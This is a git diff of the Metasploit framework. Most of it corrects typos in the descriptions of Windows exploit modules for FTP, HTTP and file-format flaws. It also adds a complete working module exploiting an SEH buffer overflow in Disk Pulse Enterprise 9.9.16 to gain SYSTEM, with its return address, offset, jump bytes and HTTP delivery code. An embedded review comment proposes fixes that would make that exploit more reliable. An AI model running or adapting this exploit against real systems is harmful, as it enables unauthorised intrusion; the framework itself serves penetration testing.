 'Author' => [
diff --git a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb
index 03aab1aec2..e5c0dbbf67 100644
--- a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb
+++ b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote
 structure from the file to calculate a pointer offset without doing proper validation. Attacker supplied data is then used to calculate the location of an object, and in turn a virtual function call. This results in arbitrary code
- exection.
+ execution.
 NOTE: On some versions of Office, the user will need to dismiss a warning dialog prior to the payload executing.
diff --git a/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb b/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb
index 73db9b695e..d26da87e6a 100644
--- a/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb
+++ b/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Description' => %q{
 This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP. By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker
- can get the control of the excution flow. This results aribrary code execution under
+ can get the control of the execution flow. This results in arbitrary code execution under
 the context of the user.
 },
 'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb
index 0514c39ea8..00b0a02650 100644
--- a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb
+++ b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb
@@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
 This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine, and the number of bytes to copy, therefore causing a stack-
- based buffer overflow. This results aribrary code execution under the context of
- user the user.
+ based buffer overflow. This results in arbitrary code execution under the context of
+ the user.
 },
 'License' => MSF_LICENSE,
 'Author' =>
diff --git a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb
index 5ba12c0a2b..4d8220ad71 100644
--- a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb
+++ b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'Microsoft Visual Basic VBP Buffer Overflow',
 'Description' => %q{
- This module exploits a stack oveflow in Microsoft Visual
+ This module exploits a stack overflow in Microsoft Visual
 Basic 6.0. When a specially crafted vbp file containing a long reference line, an attacker may be able to execute arbitrary code.
diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index 4d9e5cef47..5b77143ba6 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -41,8 +41,8 @@ class MetasploitModule < Msf::Exploit::Remote
 The flaw is due to a DWORD value extracted from the TIFF file that is embedded as a drawing in Microsoft Office, and how it gets calculated with user-controlled inputs, and stored in the EAX register. The 32-bit register will run out of storage space to
- represent the large vlaue, which ends up being 0, but it still gets pushed as a
- dwBytes argumenet (size) for a HeapAlloc call. The HeapAlloc function will allocate a
+ represent the large value, which ends up being 0, but it still gets pushed as a
+ dwBytes argument (size) for a HeapAlloc call. The HeapAlloc function will allocate a
 chunk anyway with size 0, and the address of this chunk is used as the destination buffer of a memcpy function, where the source buffer is the EXIF data (an extended image format supported by TIFF), and is also user-controlled. A function pointer in the chunk returned
diff --git a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb
index 7b73294ad7..2470394aa7 100644
--- a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb
+++ b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb
@@ -13,8 +13,8 @@ class MetasploitModule < Msf::Exploit::Remote
 'Name' => 'Orbit Downloader URL Unicode Conversion Overflow',
 'Description' => %q{
 This module exploits a stack-based buffer overflow in Orbit Downloader.
- The vulnerability is due to Orbit converting an URL ascii string to unicode
- in a insecure way with MultiByteToWideChar.
+ The vulnerability is due to Orbit converting a URL ascii string to unicode
+ in an insecure way with MultiByteToWideChar.
 The vulnerability is exploited with a specially crafted metalink file that should be opened with Orbit through the "File->Add Metalink..." option.
 },
diff --git a/modules/exploits/windows/fileformat/shaper_pdf_bof.rb b/modules/exploits/windows/fileformat/shaper_pdf_bof.rb
index 3f1268d324..1d628f94e8 100644
--- a/modules/exploits/windows/fileformat/shaper_pdf_bof.rb
+++ b/modules/exploits/windows/fileformat/shaper_pdf_bof.rb
@@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
 'Name' => 'PDF Shaper Buffer Overflow',
 'Description' => %q{
 PDF Shaper is prone to a security vulnerability when processing PDF files.
- The vulnerability appear when we use Convert PDF to Image and use a specially
- crafted PDF file. This module has been tested successfully on Win Xp, Win 7,
+ The vulnerability appears when we use Convert PDF to Image and use a specially
+ crafted PDF file. This module has been tested successfully on Win XP, Win 7,
 Win 8, Win 10.
 },
 'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb b/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb
index f9109ee076..41f46b13aa 100644
--- a/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb
+++ b/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Name' => 'Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow',
 'Description' => %q{
 This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability
- occurs opening malformed Settings.ini file e.g."C:\Program Files\Total Video Player\".
+ occurs opening malformed Settings.ini file e.g. "C:\Program Files\Total Video Player\".
 This module has been tested successfully on Windows WinXp-Sp3-EN, Windows 7, and Windows 8.
 },
 'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb
index b4906989b6..90ac34302f 100644
--- a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb
+++ b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
 execution. A patch is available at visiwave.com; the fix is done by XORing the return value as null if no match is found, and then it is validated before use.
- NOTE: During installation, the application will register two file handle's, VWS and VWR and allows a
+ NOTE: During installation, the application will register two file handles, VWS and VWR, which allows a
 victim user to 'double click' the malicious VWR file and execute code. This module was also built to bypass ASLR and DEP.
 },
diff --git a/modules/exploits/windows/fileformat/vlc_smb_uri.rb b/modules/exploits/windows/fileformat/vlc_smb_uri.rb
index 0c5cf632e8..806c8bc757 100644
--- a/modules/exploits/windows/fileformat/vlc_smb_uri.rb
+++ b/modules/exploits/windows/fileformat/vlc_smb_uri.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Name' => 'VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow',
 'Description' => %q{
 This module exploits a stack-based buffer overflow in the Win32AddConnection
- function of the VideoLAN VLC media player. Versions 0.9.9 throught 1.0.1 are
+ function of the VideoLAN VLC media player. Versions 0.9.9 through 1.0.1 are
 reportedly affected. This vulnerability is only present in Win32 builds of VLC.
diff --git a/modules/exploits/windows/fileformat/vuplayer_cue.rb b/modules/exploits/windows/fileformat/vuplayer_cue.rb
index 069d0c259f..dd0167afe8 100644
--- a/modules/exploits/windows/fileformat/vuplayer_cue.rb
+++ b/modules/exploits/windows/fileformat/vuplayer_cue.rb
@@ -12,8 +12,8 @@ class MetasploitModule < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'VUPlayer CUE Buffer Overflow',
 'Description' => %q{
- This module exploits a stack over flow in VUPlayer <= 2.49. When
- the application is used to open a specially crafted cue file, an buffer is overwritten allowing
+ This module exploits a stack based overflow in VUPlayer <= 2.49. When
+ the application is used to open a specially crafted cue file, a buffer is overwritten allowing
 for the execution of arbitrary code.
 },
 'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/fileformat/winamp_maki_bof.rb b/modules/exploits/windows/fileformat/winamp_maki_bof.rb
index de294f91d3..de79640252 100644
--- a/modules/exploits/windows/fileformat/winamp_maki_bof.rb
+++ b/modules/exploits/windows/fileformat/winamp_maki_bof.rb
@@ -15,9 +15,9 @@ class MetasploitModule < Msf::Exploit::Remote
 'Description' => %q{
 This module exploits a stack based buffer overflow in Winamp 5.55. The flaw exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file,
- where memmove is used with in a insecure way with user controlled data.
+ where memmove is used in an insecure way with user controlled data.
- To exploit the vulnerability the attacker must convince the attacker to install the
+ To exploit the vulnerability the attacker must convince the victim to install the
 generated mcvcore.maki file in the "scripts" directory of the default "Bento" skin, or generate a new skin using the crafted mcvcore.maki file. The module has been tested successfully on Windows XP SP3 and Windows 7 SP1.
diff --git a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb
index c6fff6e62f..c8e9bee1a8 100644
--- a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb
+++ b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Name' => 'Wireshark wiretap/mpeg.c Stack Buffer Overflow',
 'Description' => %q{
 This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5
- by generating an malicious file.)
+ by generating a malicious file.
 },
 'License' => MSF_LICENSE,
 'Author' =>
diff --git a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb
index 730fb7d347..39b8b166cf 100644
--- a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb
+++ b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1. An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded - PLS file within a browser, when the PLS extention is registered to Zinf. + PLS file within a browser, when the PLS extension is registered to Zinf. This functionality has not been tested in this module. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb index c0cf7abc37..d20f38a6dd 100644 --- a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb +++ b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability', 'Description' => %q{ This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially - crafted format string specifier as a username. The crafted username is sent to to the server to + crafted format string specifier as a username. The crafted username is sent to the server to overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code. The SEH exit function is preferred so that the administrators are not left with an unhandled diff --git a/modules/exploits/windows/ftp/freeftpd_pass.rb b/modules/exploits/windows/ftp/freeftpd_pass.rb index 4815eac563..4be8f558fe 100644 --- a/modules/exploits/windows/ftp/freeftpd_pass.rb +++ b/modules/exploits/windows/ftp/freeftpd_pass.rb 
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote PASS command. This may allow a remote attacker to cause a buffer overflow, resulting in a denial of service or allow the execution of arbitrary code. - FreeFTPd must have an account set to authorization anonymous user account. + freeFTPd must have an account set to authorization anonymous user account. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb index 46528829a6..590eabf90b 100644 --- a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb +++ b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb @@ -14,8 +14,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'FTPShell 5.1 Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets - triggered when the ftp clients tries to process an overly response to a PWD command. - This will overwrite the saved EIP and structured exception handler. + triggered when the ftp client tries to process an overly long response to a PWD + command. This will overwrite the saved EIP and structured exception handler. }, 'Author' => [ diff --git a/modules/exploits/windows/ftp/httpdx_tolog_format.rb b/modules/exploits/windows/ftp/httpdx_tolog_format.rb index b866d5d4a1..10d42e2050 100644 --- a/modules/exploits/windows/ftp/httpdx_tolog_format.rb +++ b/modules/exploits/windows/ftp/httpdx_tolog_format.rb 
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'HTTPDX tolog() Function Format String Vulnerability', 'Description' => %q{ This module exploits a format string vulnerability in HTTPDX FTP server. - By sending an specially crafted FTP command containing format specifiers, an + By sending a specially crafted FTP command containing format specifiers, an attacker can corrupt memory and execute arbitrary code. By default logging is off for HTTP, but enabled for the 'moderator' user diff --git a/modules/exploits/windows/ftp/pcman_put.rb b/modules/exploits/windows/ftp/pcman_put.rb index 8b091a6b9a..62b21be60f 100644 --- a/modules/exploits/windows/ftp/pcman_put.rb +++ b/modules/exploits/windows/ftp/pcman_put.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a buffer overflow vulnerability found in the PUT command of the PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous - credientials are enabled. + credentials are enabled. }, 'Author' => [ diff --git a/modules/exploits/windows/ftp/scriptftp_list.rb b/modules/exploits/windows/ftp/scriptftp_list.rb index a34ac6221e..2ab92a7b0f 100644 --- a/modules/exploits/windows/ftp/scriptftp_list.rb +++ b/modules/exploits/windows/ftp/scriptftp_list.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote vulnerability that is triggered when processing a sufficiently long filename during a FTP LIST command resulting in overwriting the exception handler. Social engineering of executing a specially crafted - ftp file by double click will result in connecting to our malcious + ftp file by double click will result in connecting to our malicious server and perform arbitrary code execution which allows the attacker to gain the same rights as the user running ScriptFTP. This vulnerability affects versions 3.3 and earlier. 
diff --git a/modules/exploits/windows/ftp/seagull_list_reply.rb b/modules/exploits/windows/ftp/seagull_list_reply.rb index a0544f319d..503b5f12cf 100644 --- a/modules/exploits/windows/ftp/seagull_list_reply.rb +++ b/modules/exploits/windows/ftp/seagull_list_reply.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Seagull FTP v3.3 Build 409 Stack Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in the Seagull FTP client that gets - triggered when the ftp clients processes a response to a LIST command. If the + triggered when the ftp client processes a response to a LIST command. If the response contains an overly long file/folder name, a buffer overflow occurs, overwriting a structured exception handler. }, diff --git a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb index f7f5fa6061..d48f9e4942 100644 --- a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb +++ b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Vermillion FTP Daemon PORT Command Memory Corruption', 'Description' => %q{ This module exploits an out-of-bounds array access in the Arcane Software - Vermillion FTP server. By sending an specially crafted FTP PORT command, + Vermillion FTP server. By sending a specially crafted FTP PORT command, an attacker can corrupt stack memory and execute arbitrary code. This particular issue is caused by processing data bound by attacker 
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote Processing is done using a source ptr (p) and a destination pointer (q). The vulnerable function walks the input string and continues while the source byte is non-null. If a comma is encountered, the function increments - the the destination pointer. If an ascii digit [0-9] is encountered, the + the destination pointer. If an ascii digit [0-9] is encountered, the following occurs: *q = (*q * 10) + (*p - '0'); diff --git a/modules/exploits/windows/ftp/xlink_client.rb b/modules/exploits/windows/ftp/xlink_client.rb index 4751f4b74e..a2c328e275 100644 --- a/modules/exploits/windows/ftp/xlink_client.rb +++ b/modules/exploits/windows/ftp/xlink_client.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack buffer overflow in Xlink FTP Client 32 Version 3.01 that comes bundled with Omni-NFS Enterprise 5.2. - When a overly long FTP server response is recieved by a client, + When an overly long FTP server response is received by a client, arbitrary code may be executed. }, 'Author' => [ 'MC' ], diff --git a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb index d87637f8dd..17278ba87a 100644 --- a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb +++ b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable code is only accessible when clustering is configured. A request containing a - long JSESSION cookie value can lead to arbirtary code execution. + long JSESSION cookie value can lead to arbitrary code execution. }, 'Author' => 'pusscat', 'References' => 
diff --git a/modules/exploits/windows/http/disk_pulse_enterprise_get.rb b/modules/exploits/windows/http/disk_pulse_enterprise_get.rb
new file mode 100644
index 0000000000..bc878b6b7e
--- /dev/null
+++ b/modules/exploits/windows/http/disk_pulse_enterprise_get.rb
@@ -0,0 +1,92 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Disk Pulse Enterprise GET Buffer Overflow', + 'Description' => %q( + This module exploits an SEH buffer overflow in Disk Pulse Enterprise + 9.9.16. If a malicious user sends a crafted HTTP GET request + it is possible to execute a payload that would run under the Windows + NT AUTHORITY\SYSTEM account. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Chance Johnson', # msf module - albatross@loftwing.net + 'Nipun Jaswal & Anurag Srivastava' # Original discovery -- www.pyramidcyber.com + ], + 'References' => + [ + [ 'EDB', '42560' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Platform' => 'win', + 'Payload' => + { + 'EncoderType' => "alpha_mixed", + 'BadChars' => "\x00\x0a\x0d\x26" + }, + 'Targets' => + [ + [ 'Disk Pulse Enterprise 9.9.16', + { + 'Ret' => 0x1013ADDD, # POP EDI POP ESI RET 04 -- libpal.dll + 'Offset' => 2492 + }] + ], + 'Privileged' => true, + 'DisclosureDate' => 'Aug 25 2017', + 'DefaultTarget' => 0)) + + register_options([Opt::RPORT(80)]) + end + + def check + res = send_request_cgi( + 'uri' => '/', + 'method' => 'GET' + ) + + if res && res.code == 200 && res.body =~ /Disk Pulse Enterprise v9\.9\.16/ + return Exploit::CheckCode::Appears + end + + return Exploit::CheckCode::Safe + end + + def exploit + connect + + print_status("Generating exploit...") + exp = payload.encoded + exp << 'A' * (target['Offset'] - payload.encoded.length) # buffer of trash until we get to offset + exp << generate_seh_record(target.ret) + exp << make_nops(10) # NOP sled to make sure we land on jmp to shellcode + exp << "\xE9\x25\xBF\xFF\xFF" # jmp 0xffffbf2a - jmp back to 
shellcode start + exp << 'B' * (5000 - exp.length) # padding + + print_status("Sending exploit...") + + send_request_cgi( + 'uri' => '/../' + exp, + 'method' => 'GET', + 'host' => '4.2.2.2', + 'connection' => 'keep-alive' + ) + + handler + disconnect + end +end diff --git a/modules/exploits/windows/http/hp_autopass_license_traversal.rb b/modules/exploits/windows/http/hp_autopass_license_traversal.rb index dfe079ce46..33b54389da 100644 --- a/modules/exploits/windows/http/hp_autopass_license_traversal.rb +++ b/modules/exploits/windows/http/hp_autopass_license_traversal.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a code execution flaw in HP AutoPass License Server. It abuses two weaknesses in order to get its objective. First, the AutoPass application doesn't enforce - authentication in the CommunicationServlet component. Seond, it's possible to abuse a + authentication in the CommunicationServlet component. Second, it's possible to abuse a directory traversal when uploading files thorough the same component, allowing to upload an arbitrary payload embedded in a JSP. The module has been tested successfully on HP AutoPass License Server 8.01 as installed with HP Service Virtualization 3.50. diff --git a/modules/exploits/windows/http/hp_imc_mibfileupload.rb b/modules/exploits/windows/http/hp_imc_mibfileupload.rb index c5fe0e7c3e..549a377fdb 100644 --- a/modules/exploits/windows/http/hp_imc_mibfileupload.rb +++ b/modules/exploits/windows/http/hp_imc_mibfileupload.rb 
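Review bot: The padding step in `exploit`, `exp << 'A' * (target['Offset'] - payload.encoded.length)`, goes negative and raises `ArgumentError` as soon as the encoded payload is longer than 2492 bytes, because the `'Payload'` hash declares `EncoderType` and `BadChars` but no size limit; adding `'Space' => 2492` next to them lets the framework reject or re-encode oversized payloads before the request is built. Separately, `check` reports `Exploit::CheckCode::Safe` when the host does not answer at all, since a `nil` `res` falls through to the final `return`; the framework convention is `return Exploit::CheckCode::Unknown unless res` ahead of the version match so an unreachable or non-HTTP target is not recorded as patched. `exp = payload.encoded` followed by repeated `<<` also appears to append into the framework's cached encoded-payload string rather than a copy, so `exp = payload.encoded.dup` (or building from a fresh string) would avoid mutating it. Finally, the fixed `'host' => '4.2.2.2'` header is unexplained; a one-line comment stating why a constant Host value is needed (or that it is carried over from the EDB PoC) would save the next maintainer from "fixing" it.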
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a code execution flaw in HP Intelligent Management Center. The vulnerability exists in the mibFileUpload which is accepting unauthenticated - file uploads and handling zip contents in a insecure way. Combining both weaknesses + file uploads and handling zip contents in an insecure way. Combining both weaknesses a remote attacker can accomplish arbitrary file upload. This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. }, diff --git a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb index e13fea3d96..4025f63965 100644 --- a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb +++ b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote 1. An "Accept-Language" header longer than 100 bytes 2. An "OVABverbose" URI variable set to "on", "true" or "1" - The vulnerability is related to "_WebSession::GetWebLocale()" .. + The vulnerability is related to "_WebSession::GetWebLocale()". NOTE: This exploit has been tested successfully with a reverse_ord_tcp payload. }, diff --git a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb index 898d0ca5e7..a9a0fc253c 100644 --- a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb +++ b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb 
@@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote address. The vulnerability is due to the use of the function "_OVConcatPath" which finally - uses "strcat" in a insecure way. User controlled data is concatenated to a string + uses "strcat" in an insecure way. User controlled data is concatenated to a string which contains the OpenView installation path. To achieve reliable exploitation a directory traversal in OpenView5.exe diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb index ddfbf25392..9fd6a6cd2d 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote timestamp prior to April 7th, 2010. Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined - with a some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is + with some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is important to note that this vulnerability must be exploited by overwriting SEH. This is since overflowing the buffer with controllable data always triggers an access violation when attempting to write static text beyond the end of the stack. diff --git a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb index 286bec091c..62ba2f732b 100644 --- a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb +++ b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb 
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. - The vulnerable code lies within the a function within "snmpviewer.exe" with a + The vulnerable code lies within a function within "snmpviewer.exe" with a timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET or POST request. The request must contain 'act' and 'app' parameters which, when combined, total more than the 1024 byte stack buffer can hold. diff --git a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb index 6839e47c99..97080de852 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.0 and 7.53. By sending a CGI request with a specially OvOSLocale cookie to Toolbar.exe, an attacker may be able to execute arbitrary code. Please note that this module only works - against a specific build (ie. NNM 7.53_01195) + against a specific build (i.e. NNM 7.53_01195) }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb index ee3b876650..f357451095 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb 
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is not triggerable via a GET request due to limitations on the - request size. The buffer being targetted is 16384 bytes in size. There are actually two + request size. The buffer being targeted is 16384 bytes in size. There are actually two adjacent buffers that both get overflowed (one into the other), and strcat is used. The vulnerable code is within the "execvp_nc" function within "ov.dll" prior to diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb index 8533e86032..175c790ec0 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => "HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow", 'Description' => %q{ This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53. - By sending a request continaing a cookie longer than 5120 bytes, an attacker can overflow + By sending a request containing a cookie longer than 5120 bytes, an attacker can overflow a stack buffer and execute arbitrary code. The vulnerable code is within the OvWwwDebug function. The static-sized stack buffer is @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote like the following: #0 ... - #1 sprintf_new(local_stack_buf, fmt, cooke); + #1 sprintf_new(local_stack_buf, fmt, cookie); #2 OvWwwDebug(" HTTP_COOKIE=%s\n", cookie); #3 ?OvWwwInit@@YAXAAHQAPADPBD@Z(x, x, x); #4 sub_405ee0("nnm", "webappmon"); 
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote is easily achieved by overwriting the saved return address or SEH frame. The original advisory detailed an attack vector using the "OvJavaLocale" cookie being - passed in a request ot "webappmon.exe". Further research shows that several different + passed in a request to "webappmon.exe". Further research shows that several different cookie values, as well as several different CGI applications, can be used. '}, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb index 9760118941..63d1a92528 100644 --- a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb +++ b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb @@ -16,8 +16,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a hidden account in the com.trinagy.security.XMLUserManager Java class. When using this account, an attacker can abuse the - com.trinagy.servlet.HelpManagerServlet class and write arbitary files to the system - allowing the execution of arbitary code. + com.trinagy.servlet.HelpManagerServlet class and write arbitrary files to the system + allowing the execution of arbitrary code. NOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0 }, diff --git a/modules/exploits/windows/http/hp_power_manager_filename.rb b/modules/exploits/windows/http/hp_power_manager_filename.rb index b509c49c96..24f401dc26 100644 --- a/modules/exploits/windows/http/hp_power_manager_filename.rb +++ b/modules/exploits/windows/http/hp_power_manager_filename.rb 
